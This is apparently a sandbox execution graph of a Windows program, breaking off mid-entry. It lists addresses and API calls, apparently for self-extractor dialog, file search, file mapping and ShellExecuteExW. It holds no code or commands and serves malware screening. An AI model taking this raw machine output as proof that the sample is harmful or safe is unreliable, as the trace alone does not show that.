                                                                                                                                                                          execution_graph 20339 7ff70ece47f0 20352 7ff70ecd8e0c 20339->20352 20343 7ff70ece4866 20344 7ff70ece4909 20343->20344 20346 7ff70ece4936 20343->20346 20349 7ff70ece4931 20343->20349 20363 7ff70ecf5c30 20344->20363 20348 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20346->20348 20351 7ff70ece493c 20348->20351 20372 7ff70ecfae94 20349->20372 20353 7ff70ecd8e49 20352->20353 20355 7ff70ecd8e32 20352->20355 20377 7ff70ecd3550 33 API calls 20353->20377 20356 7ff70ecd6288 20355->20356 20378 7ff70ecd885c 20356->20378 20359 7ff70ecd62cf 20359->20343 20362 7ff70ecd62ba FindClose 20362->20359 20364 7ff70ecf5c39 20363->20364 20365 7ff70ece491c 20364->20365 20366 7ff70ecf5d20 IsProcessorFeaturePresent 20364->20366 20367 7ff70ecf5d38 20366->20367 20594 7ff70ecf5f14 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 20367->20594 20369 7ff70ecf5d4b 20595 7ff70ecf5ce0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20369->20595 20596 7ff70ecfadcc 31 API calls 2 library calls 20372->20596 20374 7ff70ecfaead 20597 7ff70ecfaec4 16 API calls abort 20374->20597 20377->20355 20379 7ff70ecd887a 20378->20379 20408 7ff70ecd367c 20379->20408 20382 7ff70ecd647c 20383 7ff70ecd6592 FindNextFileW 20382->20383 20384 7ff70ecd64b9 FindFirstFileW 20382->20384 20386 7ff70ecd65b3 20383->20386 20387 7ff70ecd65a1 GetLastError 20383->20387 20384->20386 20389 7ff70ecd64de 20384->20389 20388 7ff70ecd65d1 20386->20388 20485 7ff70ecd1c80 20386->20485 20406 7ff70ecd6580 20387->20406 20489 7ff70ecd12bc 20388->20489 20412 7ff70ecd80b0 20389->20412 20393 7ff70ecf5c30 _handle_error 8 API calls 20396 7ff70ecd62b4 20393->20396 20394 7ff70ecd6508 FindFirstFileW 20401 7ff70ecd6527 20394->20401 20396->20359 20396->20362 20397 7ff70ecd65fb 20499 7ff70ecd8dc4 20397->20499 20398 7ff70ecd656f GetLastError 20398->20406 20400 7ff70ecd66d4 20403 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20400->20403 20401->20386 20401->20398 20401->20400 20404 7ff70ecd66da 20403->20404 20405 7ff70ecd66cf 20407 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20405->20407 20406->20393 20407->20400 20411 7ff70ecd36c6 memcpy_s 20408->20411 20409 7ff70ecf5c30 _handle_error 8 API calls 20410 7ff70ecd378a 20409->20410 20410->20359 20410->20382 20411->20409 20413 7ff70ecd80ef 20412->20413 20414 7ff70ecd80e8 20412->20414 20417 7ff70ecd12bc 33 API calls 20413->20417 20415 7ff70ecf5c30 _handle_error 8 API calls 20414->20415 20416 7ff70ecd6504 20415->20416 20416->20394 20416->20401 20418 7ff70ecd811a 20417->20418 20419 7ff70ecd836b 20418->20419 20420 7ff70ecd813a 20418->20420 20534 7ff70ecd7a28 GetCurrentDirectoryW 20419->20534 20422 7ff70ecd8154 20420->20422 20423 7ff70ecd81ed 20420->20423 20449 7ff70ecd874f 20422->20449 20503 7ff70ecd7050 20422->20503 20450 7ff70ecd12bc 33 API calls 20423->20450 20483 7ff70ecd81e8 20423->20483 20425 7ff70ecd838a 20428 7ff70ecd8593 20425->20428 20429 7ff70ecd83bf 20425->20429 20425->20483 20427 7ff70ecd8773 20554 7ff70ecd1bd4 33 API calls std::_Xinvalid_argument 20427->20554 20428->20427 20435 7ff70ecd7050 4 API calls 20428->20435 20430 7ff70ecd8761 20429->20430 20436 7ff70ecd7050 4 API calls 20429->20436 20552 7ff70ecd1bd4 33 API calls std::_Xinvalid_argument 20430->20552 20431 7ff70ecd8779 20438 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20431->20438 20432 7ff70ecd8755 20437 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20432->20437 20434 7ff70ecd81a7 20451 7ff70ecd81b9 memcpy_s 20434->20451 20511 7ff70ecd1b70 20434->20511 20440 7ff70ecd85fa 20435->20440 20461 7ff70ecd841a memcpy_s 20436->20461 20445 7ff70ecd875b 20437->20445 20446 7ff70ecd877f 20438->20446 20439 7ff70ecd874a 20444 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20439->20444 20549 7ff70ecd11ec 33 API calls memcpy_s 20440->20549 20442 7ff70ecd8767 20454 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20442->20454 20443 7ff70ecd1b70 31 API calls 20443->20483 20444->20449 20455 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20445->20455 20457 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20446->20457 20551 7ff70ecd1bd4 33 API calls std::_Xinvalid_argument 20449->20551 20458 7ff70ecd8262 20450->20458 20451->20443 20452 7ff70ecd860d 20550 7ff70ecd6d64 33 API calls memcpy_s 20452->20550 20460 7ff70ecd876d 20454->20460 20455->20430 20456 7ff70ecd1b70 31 API calls 20467 7ff70ecd8499 20456->20467 20462 7ff70ecd8785 20457->20462 20516 7ff70ecd6dd8 20458->20516 20553 7ff70ecd353c 47 API calls 20460->20553 20461->20442 20461->20456 20466 7ff70ecd1b70 31 API calls 20469 7ff70ecd8690 20466->20469 20470 7ff70ecd84c5 20467->20470 20544 7ff70ecd1734 33 API calls 4 library calls 20467->20544 20468 7ff70ecd861d memcpy_s 20468->20446 20468->20466 20471 7ff70ecd1b70 31 API calls 20469->20471 20470->20460 20476 7ff70ecd12bc 33 API calls 20470->20476 20474 7ff70ecd869a 20471->20474 20473 7ff70ecd1b70 31 API calls 20478 7ff70ecd8311 20473->20478 20475 7ff70ecd1b70 31 API calls 20474->20475 20475->20483 20480 7ff70ecd8566 20476->20480 20477 7ff70ecd828d memcpy_s 20477->20445 20477->20473 20479 7ff70ecd1b70 31 API calls 20478->20479 20479->20483 20545 7ff70ecd1c04 20480->20545 20482 7ff70ecd8583 20484 7ff70ecd1b70 31 API calls 20482->20484 20483->20414 20483->20431 20483->20432 20483->20439 20484->20483 20486 7ff70ecd1cc6 20485->20486 20487 7ff70ecd1c9b memcpy_s 20485->20487 20582 7ff70ecd1464 33 API calls 3 library calls 20486->20582 20487->20388 20490 7ff70ecd12f0 20489->20490 20491 7ff70ecd13bb 20489->20491 20494 7ff70ecd13b6 20490->20494 20495 7ff70ecd1358 20490->20495 20498 7ff70ecd12fe memcpy_s 20490->20498 20584 7ff70ecd1bd4 33 API calls std::_Xinvalid_argument 20491->20584 20583 7ff70ecd1b50 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 20494->20583 20497 7ff70ecf5ae0 4 API calls 20495->20497 20495->20498 20497->20498 20498->20397 20500 7ff70ecd8dd9 20499->20500 20585 7ff70ecd8f28 20500->20585 20502 7ff70ecd6609 20502->20405 20502->20406 20504 7ff70ecd709d 20503->20504 20506 7ff70ecd70b2 memcpy_s 20503->20506 20505 7ff70ecd715d 20504->20505 20504->20506 20509 7ff70ecd70e4 20504->20509 20564 7ff70ecd1b50 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 20505->20564 20506->20434 20509->20506 20555 7ff70ecf5ae0 20509->20555 20512 7ff70ecd1b83 20511->20512 20513 7ff70ecd1bac 20511->20513 20512->20513 20514 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20512->20514 20513->20451 20515 7ff70ecd1bd0 20514->20515 20517 7ff70ecd6e01 20516->20517 20518 7ff70ecd6e13 20517->20518 20519 7ff70ecd6e56 20517->20519 20522 7ff70ecd7050 4 API calls 20518->20522 20568 7ff70ecd1bd4 33 API calls std::_Xinvalid_argument 20519->20568 20523 7ff70ecd6e3e 20522->20523 20524 7ff70ecd52c0 20523->20524 20528 7ff70ecd530e 20524->20528 20525 7ff70ecd5314 memcpy_s 20525->20477 20526 7ff70ecd54a1 20570 7ff70ecd1bd4 33 API calls std::_Xinvalid_argument 20526->20570 20528->20525 20528->20526 20530 7ff70ecd549c 20528->20530 20531 7ff70ecd5418 20528->20531 20569 7ff70ecd1b50 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 20530->20569 20531->20525 20533 7ff70ecf5ae0 4 API calls 20531->20533 20533->20525 20535 7ff70ecd7a4c 20534->20535 20541 7ff70ecd7ad9 20534->20541 20571 7ff70ecd13c4 20535->20571 20538 7ff70ecd7a8d 20539 7ff70ecd1c80 33 API calls 20538->20539 20540 7ff70ecd7a9b 20539->20540 20540->20541 20542 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20540->20542 20541->20425 20543 7ff70ecd7af5 20542->20543 20544->20470 20546 7ff70ecd1c55 20545->20546 20548 7ff70ecd1c29 memcpy_s 20545->20548 20581 7ff70ecd15a8 33 API calls 3 library calls 20546->20581 20548->20482 20549->20452 20550->20468 20557 7ff70ecf5aeb 20555->20557 20556 7ff70ecf5b04 20556->20506 20557->20556 20559 7ff70ecf5b0a 20557->20559 20565 7ff70ecff0c8 EnterCriticalSection LeaveCriticalSection abort 20557->20565 20560 7ff70ecf5b15 20559->20560 20566 7ff70ecf674c RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 20559->20566 20567 7ff70ecd1b50 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 20560->20567 20565->20557 20566->20560 20572 7ff70ecd13cd 20571->20572 20578 7ff70ecd144d GetCurrentDirectoryW 20571->20578 20573 7ff70ecd145d 20572->20573 20574 7ff70ecd13ee memcpy_s 20572->20574 20580 7ff70ecd1be8 33 API calls std::_Xinvalid_argument 20573->20580 20579 7ff70ecd196c 31 API calls _invalid_parameter_noinfo_noreturn 20574->20579 20578->20538 20579->20578 20581->20548 20582->20487 20586 7ff70ecd90c6 20585->20586 20587 7ff70ecd8f5a 20585->20587 20593 7ff70ecd353c 47 API calls 20586->20593 20591 7ff70ecd8f74 memcpy_s 20587->20591 20592 7ff70ecd6edc 33 API calls 2 library calls 20587->20592 20591->20502 20592->20591 20594->20369 20596->20374 20657 7ff70ecd32f0 20665 7ff70ecd3327 20657->20665 20658 7ff70ecd335b 20659 7ff70ecf5c30 _handle_error 8 API calls 20658->20659 20660 7ff70ecd33dd 20659->20660 20662 7ff70ecd33c3 20664 7ff70ecd1b70 31 API calls 20662->20664 20664->20658 20665->20658 20665->20662 20666 7ff70ecd33ee 20665->20666 20670 7ff70ecd6858 20665->20670 20693 7ff70ecddacc 20665->20693 20667 7ff70ecd33ff 20666->20667 20697 7ff70ecdd9b4 CompareStringW 20666->20697 20667->20662 20669 7ff70ecd1c80 33 API calls 20667->20669 20669->20662 20672 7ff70ecd6898 20670->20672 20671 7ff70ecd6962 20698 7ff70ecd6ae8 20671->20698 20672->20671 20679 7ff70ecd68d6 __vcrt_FlsAlloc 20672->20679 20705 7ff70ece0ad0 CompareStringW 20672->20705 20674 7ff70ecf5c30 _handle_error 8 API calls 20675 7ff70ecd6ac7 20674->20675 20675->20665 20677 7ff70ecd6a85 20680 7ff70ecd68fd 20677->20680 20708 7ff70ecdd9d0 CompareStringW 20677->20708 20679->20680 20682 7ff70ecd6946 __vcrt_FlsAlloc 20679->20682 20706 7ff70ece0ad0 CompareStringW 20679->20706 20680->20674 20682->20671 20682->20680 20683 7ff70ecd69fd 20682->20683 20684 7ff70ecd12bc 33 API calls 20682->20684 20688 7ff70ecd6a6a __vcrt_FlsAlloc 20682->20688 20686 7ff70ecd6adf 20683->20686 20687 7ff70ecd6a4d 20683->20687 20685 7ff70ecd69ea 20684->20685 20689 7ff70ecd885c 8 API calls 20685->20689 20690 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20686->20690 20687->20680 20687->20688 20707 7ff70ece0ad0 CompareStringW 20687->20707 20688->20671 20688->20677 20688->20680 20689->20683 20692 7ff70ecd6ae4 20690->20692 20695 7ff70ecddadf 20693->20695 20694 7ff70ecddafd 20694->20665 20695->20694 20696 7ff70ecd1c80 33 API calls 20695->20696 20696->20694 20697->20667 20701 7ff70ecd6b14 20698->20701 20699 7ff70ecd6c1d 20700 7ff70ecd6ae8 CompareStringW 20699->20700 20703 7ff70ecd6bc1 20699->20703 20700->20699 20701->20699 20702 7ff70ecd6c02 20701->20702 20701->20703 20702->20703 20709 7ff70ecdd9d0 CompareStringW 20702->20709 20703->20680 20705->20679 20706->20682 20707->20688 20708->20680 20709->20703 20710 7ff70ecf4976 14 API calls _com_raise_error 21363 7ff70eceece0 21708 7ff70ecd215c 21363->21708 21365 7ff70eceed2b 21366 7ff70ecef9e3 21365->21366 21367 7ff70eceed3f 21365->21367 21517 7ff70eceed5c 21365->21517 21908 7ff70ecf2ee0 21366->21908 21369 7ff70eceed4f 21367->21369 21370 7ff70eceee2b 21367->21370 21367->21517 21374 7ff70eceedf9 21369->21374 21375 7ff70eceed57 21369->21375 21376 7ff70eceeee1 21370->21376 21383 7ff70eceee45 21370->21383 21372 7ff70ecf5c30 _handle_error 8 API calls 21373 7ff70ecefea0 21372->21373 21382 7ff70eceee1b EndDialog 21374->21382 21374->21517 21386 7ff70ecdaee0 48 API calls 21375->21386 21375->21517 21716 7ff70ecd1ebc GetDlgItem 21376->21716 21377 7ff70ecefa19 21380 7ff70ecefa25 SendDlgItemMessageW 21377->21380 21381 7ff70ecefa40 GetDlgItem SendMessageW 21377->21381 21378 7ff70ecefa0a SendMessageW 21378->21377 21380->21381 21385 7ff70ecd7a28 35 API calls 21381->21385 21382->21517 21387 7ff70ecdaee0 48 API calls 21383->21387 21388 7ff70ecefa97 GetDlgItem 21385->21388 21389 7ff70eceed86 21386->21389 21390 7ff70eceee63 SetDlgItemTextW 21387->21390 21927 7ff70ecd2120 21388->21927 21930 7ff70ecd1a94 34 API calls _handle_error 21389->21930 21395 7ff70eceee76 21390->21395 21393 7ff70eceef45 21412 7ff70ecef815 21393->21412 21533 7ff70eceef01 EndDialog 21393->21533 21394 7ff70eceef58 GetDlgItem 21399 7ff70eceef72 SendMessageW SendMessageW 21394->21399 21400 7ff70eceef9f SetFocus 21394->21400 21404 7ff70eceee90 GetMessageW 21395->21404 21395->21517 21398 7ff70eceed96 21403 7ff70eceedac 21398->21403 21409 7ff70ecd210c SetDlgItemTextW 21398->21409 21399->21400 21405 7ff70eceefb5 21400->21405 21406 7ff70ecef042 21400->21406 21401 7ff70eceef2a 21407 7ff70ecd1b70 31 API calls 21401->21407 21422 7ff70ecefeb3 21403->21422 21403->21517 21411 7ff70eceeeae IsDialogMessageW 21404->21411 21404->21517 21413 7ff70ecdaee0 48 API calls 21405->21413 21931 7ff70ecd2314 21406->21931 21407->21517 21409->21403 21411->21395 21416 7ff70eceeec3 TranslateMessage DispatchMessageW 21411->21416 21417 7ff70ecdaee0 48 API calls 21412->21417 21418 7ff70eceefbf 21413->21418 21415 7ff70ecef07c 21941 7ff70ecf2ad0 33 API calls 2 library calls 21415->21941 21416->21395 21419 7ff70ecef826 SetDlgItemTextW 21417->21419 21429 7ff70ecd12bc 33 API calls 21418->21429 21423 7ff70ecdaee0 48 API calls 21419->21423 21424 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21422->21424 21428 7ff70ecef858 21423->21428 21430 7ff70ecefeb8 21424->21430 21426 7ff70ecef087 21427 7ff70ecdaee0 48 API calls 21426->21427 21433 7ff70ecef0a5 21427->21433 21444 7ff70ecd12bc 33 API calls 21428->21444 21434 7ff70eceefe8 21429->21434 21439 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21430->21439 21436 7ff70ecdda04 48 API calls 21433->21436 21437 7ff70ecf2bf4 24 API calls 21434->21437 21443 7ff70ecef0b8 21436->21443 21445 7ff70eceeff5 21437->21445 21447 7ff70ecefebe 21439->21447 21451 7ff70ecf2bf4 24 API calls 21443->21451 21477 7ff70ecef881 21444->21477 21445->21430 21461 7ff70ecef038 21445->21461 21457 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21447->21457 21454 7ff70ecef0c8 21451->21454 21467 7ff70ecd1b70 31 API calls 21454->21467 21455 7ff70ecef92a 21460 7ff70ecdaee0 48 API calls 21455->21460 21462 7ff70ecefec4 21457->21462 21472 7ff70ecef934 21460->21472 21469 7ff70ecef13c 21461->21469 21942 7ff70ecf3584 33 API calls 2 library calls 21461->21942 21482 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21462->21482 21476 7ff70ecef0d6 21467->21476 21470 7ff70ecef16a 21469->21470 21943 7ff70ecd587c 21469->21943 21481 7ff70ecd552c 56 API calls 21470->21481 21493 7ff70ecd12bc 33 API calls 21472->21493 21476->21447 21476->21461 21477->21455 21488 7ff70ecd12bc 33 API calls 21477->21488 21486 7ff70ecef180 21481->21486 21487 7ff70ecefeca 21482->21487 21491 7ff70ecef184 GetLastError 21486->21491 21492 7ff70ecef19c 21486->21492 21499 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21487->21499 21494 7ff70ecef8cf 21488->21494 21491->21492 21730 7ff70ecd8cf8 21492->21730 21498 7ff70ecef95d 21493->21498 21501 7ff70ecdaee0 48 API calls 21494->21501 21497 7ff70ecef15e 21946 7ff70eced908 12 API calls _handle_error 21497->21946 21515 7ff70ecd12bc 33 API calls 21498->21515 21505 7ff70ecefed0 21499->21505 21506 7ff70ecef8da 21501->21506 21516 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21505->21516 21970 7ff70ecd1170 33 API calls memcpy_s 21506->21970 21508 7ff70ecef1ae 21513 7ff70ecef1b5 GetLastError 21508->21513 21514 7ff70ecef1c4 21508->21514 21511 7ff70ecef8f2 21522 7ff70ecd1c04 33 API calls 21511->21522 21513->21514 21518 7ff70ecef26c 21514->21518 21523 7ff70ecef27b 21514->21523 21524 7ff70ecef1db GetTickCount 21514->21524 21519 7ff70ecef99e 21515->21519 21520 7ff70ecefed6 21516->21520 21517->21372 21518->21523 21541 7ff70ecef6c9 21518->21541 21535 7ff70ecd1b70 31 API calls 21519->21535 21525 7ff70ecd215c 61 API calls 21520->21525 21526 7ff70ecef90e 21522->21526 21527 7ff70ecef5a0 21523->21527 21947 7ff70ecd7c10 21523->21947 21733 7ff70ecd5238 21524->21733 21529 7ff70eceff34 21525->21529 21530 7ff70ecd1b70 31 API calls 21526->21530 21527->21533 21534 7ff70ecd6e5c 33 API calls 21527->21534 21536 7ff70eceff38 21529->21536 21544 7ff70eceffd9 GetDlgItem SetFocus 21529->21544 21573 7ff70eceff4d 21529->21573 21538 7ff70ecef91c 21530->21538 21533->21401 21542 7ff70ecef5c5 21534->21542 21543 7ff70ecef9c8 21535->21543 21553 7ff70ecf5c30 _handle_error 8 API calls 21536->21553 21547 7ff70ecd1b70 31 API calls 21538->21547 21539 7ff70ecef29e 21959 7ff70ecdbc90 131 API calls 21539->21959 21556 7ff70ecdaee0 48 API calls 21541->21556 21967 7ff70ecd1170 33 API calls memcpy_s 21542->21967 21552 7ff70ecd1b70 31 API calls 21543->21552 21549 7ff70ecf000a 21544->21549 21547->21455 21562 7ff70ecd12bc 33 API calls 21549->21562 21550 7ff70ecef20a 21555 7ff70ecd1b70 31 API calls 21550->21555 21558 7ff70ecef9d3 21552->21558 21559 7ff70ecf05e7 21553->21559 21554 7ff70ecef2b8 21561 7ff70ecdda04 48 API calls 21554->21561 21563 7ff70ecef218 21555->21563 21564 7ff70ecef6f7 SetDlgItemTextW 21556->21564 21557 7ff70ecef5da 21565 7ff70ecdaee0 48 API calls 21557->21565 21566 7ff70ecd1b70 31 API calls 21558->21566 21560 7ff70eceff84 SendDlgItemMessageW 21567 7ff70eceffa4 21560->21567 21568 7ff70eceffad EndDialog 21560->21568 21569 7ff70ecef2fa GetCommandLineW 21561->21569 21570 7ff70ecf001c 21562->21570 21581 7ff70ecd4334 51 API calls 21563->21581 21571 7ff70ecd2134 21564->21571 21572 7ff70ecef5e7 21565->21572 21566->21401 21567->21568 21568->21536 21574 7ff70ecef39f 21569->21574 21575 7ff70ecef3b9 21569->21575 21576 7ff70ecd8e0c 33 API calls 21570->21576 21577 7ff70ecef715 SetDlgItemTextW GetDlgItem 21571->21577 21968 7ff70ecd1170 33 API calls memcpy_s 21572->21968 21573->21536 21573->21560 21590 7ff70ecd1c80 33 API calls 21574->21590 21960 7ff70ecee6a4 33 API calls _handle_error 21575->21960 21579 7ff70ecf0030 21576->21579 21582 7ff70ecef763 21577->21582 21583 7ff70ecef740 GetWindowLongPtrW SetWindowLongPtrW 21577->21583 21585 7ff70ecd210c SetDlgItemTextW 21579->21585 21587 7ff70ecef23e 21581->21587 21747 7ff70ecf09d8 21582->21747 21583->21582 21584 7ff70ecef5fa 21589 7ff70ecd1b70 31 API calls 21584->21589 21591 7ff70ecf0044 21585->21591 21586 7ff70ecef3ca 21961 7ff70ecee6a4 33 API calls _handle_error 21586->21961 21593 7ff70ecef245 GetLastError 21587->21593 21594 7ff70ecef254 21587->21594 21596 7ff70ecef605 21589->21596 21590->21575 21603 7ff70ecf0076 SendDlgItemMessageW FindFirstFileW 21591->21603 21593->21594 21743 7ff70ecd424c 21594->21743 21600 7ff70ecd1b70 31 API calls 21596->21600 21597 7ff70ecef3db 21962 7ff70ecee6a4 33 API calls _handle_error 21597->21962 21599 7ff70ecf09d8 188 API calls 21601 7ff70ecef78c 21599->21601 21602 7ff70ecef613 21600->21602 21900 7ff70ecf34c4 21601->21900 21613 7ff70ecdaee0 48 API calls 21602->21613 21608 7ff70ecf00cb 21603->21608 21702 7ff70ecf0554 21603->21702 21617 7ff70ecdaee0 48 API calls 21608->21617 21609 7ff70ecef3ec 21963 7ff70ecdbd30 131 API calls 21609->21963 21612 7ff70ecf09d8 188 API calls 21628 7ff70ecef7ba 21612->21628 21616 7ff70ecef62b 21613->21616 21614 7ff70ecef403 21964 7ff70ecf36e0 33 API calls 21614->21964 21615 7ff70ecf05d1 21615->21536 21629 7ff70ecd12bc 33 API calls 21616->21629 21622 7ff70ecf00ee 21617->21622 21619 7ff70ecf05f9 21620 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21619->21620 21624 7ff70ecf05fe 21620->21624 21621 7ff70ecef7e6 21969 7ff70ecd1e98 GetDlgItem EnableWindow 21621->21969 21633 7ff70ecd12bc 33 API calls 21622->21633 21623 7ff70ecef422 CreateFileMappingW 21626 7ff70ecef4a3 ShellExecuteExW 21623->21626 21627 7ff70ecef461 MapViewOfFile 21623->21627 21631 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21624->21631 21636 7ff70ecef4c4 21626->21636 21965 7ff70ecf6e10 21627->21965 21628->21621 21632 7ff70ecf09d8 188 API calls 21628->21632 21642 7ff70ecef654 21629->21642 21634 7ff70ecf0604 21631->21634 21632->21621 21635 7ff70ecf011d 21633->21635 21640 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21634->21640 21971 7ff70ecd1170 33 API calls memcpy_s 21635->21971 21638 7ff70ecef4e6 WaitForInputIdle 21636->21638 21639 7ff70ecef513 21636->21639 21644 7ff70ecef4fb 21638->21644 21649 7ff70ecef53f 21639->21649 21650 7ff70ecef52c UnmapViewOfFile CloseHandle 21639->21650 21645 7ff70ecf060a 21640->21645 21641 7ff70ecef6aa 21646 7ff70ecd1b70 31 API calls 21641->21646 21642->21487 21642->21641 21643 7ff70ecf0138 21647 7ff70ecd52c0 33 API calls 21643->21647 21644->21639 21648 7ff70ecef501 Sleep 21644->21648 21654 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21645->21654 21646->21533 21651 7ff70ecf014f 21647->21651 21648->21639 21648->21644 21649->21462 21653 7ff70ecef575 21649->21653 21650->21649 21652 7ff70ecd1b70 31 API calls 21651->21652 21655 7ff70ecf015c 21652->21655 21657 7ff70ecd1b70 31 API calls 21653->21657 21656 7ff70ecf0610 21654->21656 21655->21624 21659 7ff70ecd1b70 31 API calls 21655->21659 21660 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21656->21660 21658 7ff70ecef592 21657->21658 21661 7ff70ecd1b70 31 API calls 21658->21661 21662 7ff70ecf01c3 21659->21662 21663 7ff70ecf0616 21660->21663 21661->21527 21664 7ff70ecd210c SetDlgItemTextW 21662->21664 21666 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21663->21666 21665 7ff70ecf01d7 FindClose 21664->21665 21667 7ff70ecf01f3 21665->21667 21668 7ff70ecf02e7 SendDlgItemMessageW 21665->21668 21669 7ff70ecf061c 21666->21669 21972 7ff70ecede44 10 API calls _handle_error 21667->21972 21671 7ff70ecf031b 21668->21671 21673 7ff70ecdaee0 48 API calls 21671->21673 21672 7ff70ecf0216 21674 7ff70ecdaee0 48 API calls 21672->21674 21675 7ff70ecf0328 21673->21675 21676 7ff70ecf021f 21674->21676 21678 7ff70ecd12bc 33 API calls 21675->21678 21677 7ff70ecdda04 48 API calls 21676->21677 21682 7ff70ecf023c memcpy_s 21677->21682 21679 7ff70ecf0357 21678->21679 21973 7ff70ecd1170 33 API calls memcpy_s 21679->21973 21680 7ff70ecd1b70 31 API calls 21683 7ff70ecf02d3 21680->21683 21682->21634 21682->21680 21685 7ff70ecd210c SetDlgItemTextW 21683->21685 21684 7ff70ecf0372 21686 7ff70ecd52c0 33 API calls 21684->21686 21685->21668 21687 7ff70ecf0389 21686->21687 21688 7ff70ecd1b70 31 API calls 21687->21688 21689 7ff70ecf0395 memcpy_s 21688->21689 21690 7ff70ecd1b70 31 API calls 21689->21690 21691 7ff70ecf03cf 21690->21691 21692 7ff70ecd1b70 31 API calls 21691->21692 21693 7ff70ecf03dc 21692->21693 21693->21645 21694 7ff70ecd1b70 31 API calls 21693->21694 21695 7ff70ecf0443 21694->21695 21696 7ff70ecd210c SetDlgItemTextW 21695->21696 21697 7ff70ecf0457 21696->21697 21697->21702 21974 7ff70ecede44 10 API calls _handle_error 21697->21974 21699 7ff70ecf0482 21700 7ff70ecdaee0 48 API calls 21699->21700 21701 7ff70ecf048c 21700->21701 21703 7ff70ecdda04 48 API calls 21701->21703 21702->21536 21702->21615 21702->21619 21702->21663 21705 7ff70ecf04a9 memcpy_s 21703->21705 21704 7ff70ecd1b70 31 API calls 21706 7ff70ecf0540 21704->21706 21705->21656 21705->21704 21707 7ff70ecd210c SetDlgItemTextW 21706->21707 21707->21702 21709 7ff70ecd216a 21708->21709 21710 7ff70ecd21d0 21708->21710 21709->21710 21975 7ff70ecda8ac 21709->21975 21710->21365 21712 7ff70ecd218f 21712->21710 21713 7ff70ecd21a4 GetDlgItem 21712->21713 21713->21710 21714 7ff70ecd21b7 21713->21714 21714->21710 21715 7ff70ecd21be SetWindowTextW 21714->21715 21715->21710 21717 7ff70ecd1f34 21716->21717 21718 7ff70ecd1efc 21716->21718 22025 7ff70ecd1ff8 GetWindowTextLengthW 21717->22025 21720 7ff70ecd12bc 33 API calls 21718->21720 21721 7ff70ecd1f2a memcpy_s 21720->21721 21722 7ff70ecd1b70 31 API calls 21721->21722 21723 7ff70ecd1f89 21721->21723 21722->21723 21724 7ff70ecd1fc8 21723->21724 21727 7ff70ecd1ff0 21723->21727 21725 7ff70ecf5c30 _handle_error 8 API calls 21724->21725 21726 7ff70ecd1fdd 21725->21726 21726->21393 21726->21394 21726->21533 21728 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21727->21728 21729 7ff70ecd1ff5 21728->21729 21731 7ff70ecd8d03 21730->21731 21732 7ff70ecd8d06 SetCurrentDirectoryW 21730->21732 21731->21732 21732->21508 21734 7ff70ecd5265 21733->21734 21735 7ff70ecd527a 21734->21735 21736 7ff70ecd12bc 33 API calls 21734->21736 21737 7ff70ecf5c30 _handle_error 8 API calls 21735->21737 21736->21735 21738 7ff70ecd52b1 21737->21738 21739 7ff70eced1bc 21738->21739 21740 7ff70eced1e3 21739->21740 22037 7ff70ecd60e0 21740->22037 21742 7ff70eced1f3 memcpy_s 21742->21550 21744 7ff70ecd4266 21743->21744 21746 7ff70ecd4272 21743->21746 21745 7ff70ecd42d0 100 API calls 21744->21745 21744->21746 21745->21746 22046 7ff70ecee558 21747->22046 21749 7ff70ecf0d3e 21750 7ff70ecd1b70 31 API calls 21749->21750 21751 7ff70ecf0d47 21750->21751 21752 7ff70ecf5c30 _handle_error 8 API calls 21751->21752 21754 7ff70ecef77b 21752->21754 21753 7ff70ecdd124 33 API calls 21889 7ff70ecf0a53 memcpy_s 21753->21889 21754->21599 21755 7ff70ecf2a4a 22134 7ff70ecd353c 47 API calls 21755->22134 21758 7ff70ecf2a50 22135 7ff70ecd353c 47 API calls 21758->22135 21760 7ff70ecf2a56 21765 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21760->21765 21762 7ff70ecf2a3e 21763 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21762->21763 21764 7ff70ecf2a44 21763->21764 22133 7ff70ecd353c 47 API calls 21764->22133 21767 7ff70ecf2a5c 21765->21767 21769 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21767->21769 21771 7ff70ecf2a62 21769->21771 21770 7ff70ecf299a 21772 7ff70ecf2a22 21770->21772 21774 7ff70ecd1c80 33 API calls 21770->21774 21773 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21771->21773 22131 7ff70ecd1b50 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 21772->22131 21778 7ff70ecf2a68 21773->21778 21781 7ff70ecf29c7 